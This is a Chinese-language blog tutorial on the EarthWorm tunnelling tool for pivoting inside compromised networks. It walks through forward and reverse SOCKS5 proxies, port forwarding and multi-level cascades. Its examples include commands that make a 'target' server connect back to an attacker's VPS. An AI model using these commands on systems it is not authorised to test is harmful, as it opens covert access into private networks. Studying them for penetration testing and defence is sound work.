內網滲透入門到放棄之必備殺器—EarthWorm

0x00 前言

當你在內網滲透,並且拿下一臺機器的權限時,你是不是覺得已經算是一次完整的滲透了?

不來一次內網漫遊,滲透是不完整的,哈哈。

本文給大家推薦一款內網穿透神器EarthWorm,(簡稱EW)是一套輕量便攜且功能強大的網絡穿透工具,基於標準C開發,具有socks5代理、端口轉發和端口映射三大功能。

內網滲透入門到放棄之必備殺器—EarthWorm

它強在哪些方面呢?

1.可穿透複雜的內網環境。(這麼說吧:我本地連著路由器開一個虛擬機,可以直接反彈到公網的雲服務器上。)

2.以支持多平臺間的轉接通訊,Linux、Windows、MacOS、Arm-Linux均支持。

支持平臺列表:(可跨平臺反彈)

ew_for_Win.exe 適用各種Windows系統(X86指令集、X64指令集) Windows7、Windows XPew_for_Linux32 各常見Linux發行版 (X86 指令集 CPU) Ubuntu(X86)/BT5(X86)ew_for_linux64 各常見Linux發行版 (X64 指令集 CPU) Ubuntu(X64)/Kali(X64)ew_for_MacOSX64 MacOS系統發行版 (X64 指令集) 蘋果PC電腦,蘋果serverew_for_Arm32 常見Arm-Linux系統 HTC New One(Arm-Android)/小米路由器(R1D)

ew_mipsel 常見Mips-Linux系統 (Mipsel指令集 CPU) 螢石硬盤錄像機、小米mini路由器(R1CM)

0x01 使用方法

以下所有樣例,如無特殊說明代理端口均為1080,服務均為SOCKSv5代理服務.

該工具共有 6 種命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。

1.正向SOCKS v5服務器

$ ./ew -s ssocksd -l 1080

2. 反彈 SOCKS v5 服務器

這個操作具體分兩步:

a) 先在一臺具有公網 ip 的主機A上運行以下命令:

$ ./ew -s rcsocks -l 1080 -e 8888

b) 在目標主機B上啟動 SOCKS v5 服務 並反彈到公網主機的 8888端口

$ ./ew -s rssocks -d 1.1.1.1 -e 8888

成功。

3. 多級級聯

工具中自帶的三條端口轉發指令,它們的參數格式分別為:

 $ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

通過這些端口轉發指令可以將處於網絡深層的基於TCP的服務轉發至根前,比如 SOCKS v5。

首先提供兩個“二級級聯”本地SOCKS測試樣例:

a) lcx_tran 的用法

$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

b) lcx_listen、lcx_slave 的用法

$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

再提供一個“三級級聯”的本地SOCKS測試用例以供參考

$ ./ew -s rcsocks -l 1080 -e 8888
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777

數據流向: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks

0x02 實戰測試(分為本地測試和公網IP測試)

一般最常用的就是上面的第二條:反彈 SOCKS v5 服務器。

使用實例1:

目標機器:

ew.exe -s rssocks -d 2.2.2.2 -e 888

(2.2.2.2為想要反彈到的機器)

攻擊機器:

ew.exe -s rcsocks -l 1008 -e 888

(監聽888端口,轉發到1008端口)

測試環境:

在這裡我直接用我的本機Win10作為目標機器,將虛擬機Win7作為攻擊機器。

本機Win10 ip:192.168.62.1

Win7 ip:192.168.62.128

內網滲透入門到放棄之必備殺器—EarthWorm

內網滲透入門到放棄之必備殺器—EarthWorm

首先攻擊機器win7運行命令:

ew_for_Win.exe -s rcsocks -l 1008 -e 888

接收888端口的數據並轉發到1008端口。

內網滲透入門到放棄之必備殺器—EarthWorm

此時正在監聽。

目標機器Win10運行命令:

ew_for_Win.exe -s rssocks -d 192.168.62.128 -e 888
內網滲透入門到放棄之必備殺器—EarthWorm

此時攻擊機器會彈出連接成功的提示:

內網滲透入門到放棄之必備殺器—EarthWorm

好了,到此Win10的SOCKS5代理就反彈到Win7攻擊機上了。

只需要一個Socks5連接工具就可以連接到本地1008端口來代理訪問了。

推薦工具SocksCap64。

內網滲透入門到放棄之必備殺器—EarthWorm

在代理處配置127.0.0.1:1008

代理已連接。

使用實例2:

攻擊者洛杉磯 Linux VPS :45.78.*.*

目標阿里雲服務器 Win2008:47.93.*.*

攻擊者Linux監聽:

[root@centos6 ~]# ./ew_for_Linux32 -s rcsocks -l 1008 -e 888
內網滲透入門到放棄之必備殺器—EarthWorm

目標阿里雲服務器反彈:

ew_for_Win.exe -s rssocks -d 45.78.*.* -e 888
內網滲透入門到放棄之必備殺器—EarthWorm

攻擊機器監聽出現:rssocks cmd_socket OK!

表示反彈成功。

0x03 工具下載

分別是EarthWorm和SocksCap64。(私信我獲取)

如果你也對網絡安全感興趣,或者致力於成為一名白帽子,或者僅僅想吃瓜看調戲黑闊和騙子的日常,也請關注我,不會讓你們失望~


分享到:


相關文章: